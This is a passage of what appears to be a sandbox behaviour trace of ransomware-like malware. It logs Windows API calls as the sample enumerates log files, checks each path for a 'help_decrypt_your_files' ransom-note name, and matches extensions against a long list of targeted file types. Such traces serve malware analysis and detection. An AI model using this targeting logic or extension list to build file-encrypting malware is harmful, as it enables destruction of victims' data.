8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.180] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xb4f89421, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xeca50022, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.004.etl", cAlternateFileName="UPD2FC~1.ETL")) returned 1
	[0179.180] lstrcmpW (lpString1="UpdateSessionOrchestration.004.etl", lpString2="..") returned 1
	[0179.180] lstrcmpW (lpString1="UpdateSessionOrchestration.004.etl", lpString2=".") returned 1
	[0179.180] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.180] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.004.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl"
	[0179.180] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl") returned 68
	[0179.180] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.180] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl") returned 0x44
	[0179.180] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.181] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.181] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl"
	[0179.181] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.004.etl") returned 68
	[0179.181] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.181] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.181] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.182] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.182] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.182] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x60797ea1, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x8857baf6, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.005.etl", cAlternateFileName="UPB784~1.ETL")) returned 1
	[0179.182] lstrcmpW (lpString1="UpdateSessionOrchestration.005.etl", lpString2="..") returned 1
	[0179.182] lstrcmpW (lpString1="UpdateSessionOrchestration.005.etl", lpString2=".") returned 1
	[0179.182] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.182] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.005.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl"
	[0179.182] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl") returned 68
	[0179.183] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.183] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl") returned 0x44
	[0179.183] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.183] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.183] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl"
	[0179.183] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.005.etl") returned 68
	[0179.183] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.184] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.184] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.184] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.184] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x615d8964, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0x88859575, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.006.etl", cAlternateFileName="UP7D55~1.ETL")) returned 1
	[0179.184] lstrcmpW (lpString1="UpdateSessionOrchestration.006.etl", lpString2="..") returned 1
	[0179.184] lstrcmpW (lpString1="UpdateSessionOrchestration.006.etl", lpString2=".") returned 1
	[0179.185] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.185] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.006.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl"
	[0179.185] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl") returned 68
	[0179.185] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.185] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl") returned 0x44
	[0179.185] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.185] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.185] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl"
	[0179.185] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.006.etl") returned 68
	[0179.186] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.186] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.186] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.